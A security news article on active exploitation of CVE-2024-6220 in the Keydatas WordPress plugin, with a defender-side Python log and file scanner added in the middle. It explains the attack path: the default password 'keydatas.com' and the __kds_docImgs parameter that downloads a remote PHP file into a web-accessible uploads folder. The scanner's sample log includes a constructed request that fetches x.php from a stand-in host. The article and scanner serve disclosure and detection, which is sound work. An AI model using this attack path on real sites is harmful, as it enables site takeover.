WordPress Plugin Flaw Allows Hackers to Take Over Sites

Hackers Exploit Dangerous Plugin Bug

Hackers are taking advantage of a serious weakness in a popular WordPress plugin called 简数采集器 (Keydatas). This security flaw, known as CVE-2024-6220, lets hackers upload any files they want to a WordPress site. This means they could run harmful code and completely control the site.

Discovery and Initial Response

The problem was discovered on June 18, 2024, by a researcher named Foxyyy. This happened during the 0-day Threat Hunt Promo of Wordfence’s Bug Bounty Program. Foxyyy quickly reported the flaw to the appropriate authorities. The vulnerability was found in the Keydatas plugin, which is used by more than 5,000 websites. Within a few days, hackers started trying to exploit this flaw.

Details of the Vulnerability

The flaw, CVE-2024-6220, affects all versions of the Keydatas plugin up to and including version 2.5.2. Here are the main details:

  • Plugin: 简数采集器 (Keydatas)
  • Plugin Slug: keydatas
  • Affected Versions: Up to and including 2.5.2
  • CVE ID: CVE-2024-6220
  • CVSS Score: 9.8 (Critical)
  • Researcher: Foxyyy
  • Fully Patched Version: 2.6.1
  • Bounty Award: $488.00

The problem occurs because the plugin does not check the type of files being uploaded. This allows hackers to upload harmful files, like malicious PHP scripts, to the WordPress uploads directory. This directory is publicly accessible, so hackers can run these harmful scripts and take over the site.

How the Attack Works

The Keydatas plugin is used to connect a WordPress site with the keydatas.com app, which helps manage WordPress posts. The plugin has a function called keydatas_post_doc() that gates access with a password check. However, the default password is set to “keydatas.com”.

If the site owner has not changed this default password, an attacker who knows it passes the check and can reach the plugin’s functions. One of these functions, keydatas_downloadImages(), is the vulnerable one. It downloads the files whose URLs are given in the __kds_docImgs request parameter and saves them into the WordPress uploads directory. Since neither the file type nor the extension is checked, an attacker can place a PHP file there, and because the uploads directory is web-accessible, that file can then be executed by requesting it.
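The following is an added example of a defender-side check for the behaviour described above; it is not Wordfence's code or the plugin's. It flags access-log requests that carry the __kds_docImgs parameter named above and any PHP-like file requested from or found under wp-content/uploads/, where the download function writes its files. The log lines, the endpoint path and the file names are constructed for the example.

```python
"""Defender-side checks for CVE-2024-6220 activity: added example, not Wordfence's
or the plugin's code. Two signals are flagged: a request carrying the
__kds_docImgs parameter named on the page, and a PHP-like file served from or
sitting in wp-content/uploads/, where keydatas_downloadImages() writes its files."""
import re
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# .php, .php5, .phtml, .phar: extensions most PHP handlers will execute
PHP_IN_UPLOADS_RE = re.compile(r'/wp-content/uploads/.*\.(php\d?|phtml|phar)$', re.IGNORECASE)

# Constructed sample lines (TEST-NET addresses); the endpoint path and file names are made up.
SAMPLE_LOG = """\
203.0.113.10 - - [20/Jun/2024:10:01:02 +0000] "POST /wp-admin/admin-ajax.php?__kds_docImgs=http://203.0.113.10/x.php HTTP/1.1" 200 512
203.0.113.10 - - [20/Jun/2024:10:01:05 +0000] "GET /wp-content/uploads/2024/06/x.php HTTP/1.1" 200 84
198.51.100.7 - - [20/Jun/2024:10:02:00 +0000] "GET /wp-content/uploads/2024/06/photo.jpg HTTP/1.1" 200 40213
198.51.100.7 - - [20/Jun/2024:10:02:30 +0000] "GET /index.php?p=12 HTTP/1.1" 200 9000
"""

def analyze_log(text):
    """Return (ip, signal, detail) tuples for suspicious requests.

    Caveat: in a POST the __kds_docImgs parameter normally travels in the body,
    which access logs do not record, so the query check only sees parameters
    that appear in the URL. The uploads check fires when a dropped script is
    actually requested and is the more reliable signal in ordinary logs."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group('target'))
        params = parse_qs(url.query)
        if '__kds_docImgs' in params:
            findings.append((m.group('ip'), 'kds_download_param', params['__kds_docImgs'][0]))
        if PHP_IN_UPLOADS_RE.search(url.path):
            findings.append((m.group('ip'), 'php_in_uploads', url.path))
    return findings

def suspicious_upload_files(relative_paths):
    """Given paths relative to wp-content/uploads (e.g. collected with os.walk),
    return the ones that look like executable PHP; a clean uploads tree has none."""
    return [p for p in relative_paths
            if PHP_IN_UPLOADS_RE.search('/wp-content/uploads/' + p.replace('\\', '/'))]
```

Feed analyze_log() your real access log and suspicious_upload_files() a listing of the uploads tree; any hit on a site running Keydatas 2.5.2 or earlier warrants an incident review, not just an update.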

Top Attacking IP Addresses

Several IP addresses have been identified as sources of these attacks:

  • 103.233.8.166 (Hong Kong)
  • 103.233.8.0 (Hong Kong)
  • 163.172.77.82 (France)
  • 84.17.37.217 (Hong Kong)
  • 84.17.57.0 (Hong Kong)

Protecting Your Site

Wordfence Premium, Care, and Response users received a firewall rule to protect against this vulnerability on June 20, 2024. Free users got the same protection on July 20, 2024. The Keydatas team was contacted on June 20, 2024. After receiving no response, the issue was escalated to the WordPress.org Security Team, leading to the plugin’s closure on July 16, 2024. A patch was released on July 29, 2024.

Users are strongly urged to update to the latest version, 2.6.1, immediately. To stay safe from such attacks, it’s essential to regularly update plugins, conduct vulnerability scans, and use robust firewall protection.

The active exploitation of the CVE-2024-6220 vulnerability in the Keydatas plugin highlights the critical need for vigilance in maintaining website security. By staying informed and proactive, website owners can protect their sites from malicious attacks and ensure a safer web environment for everyone.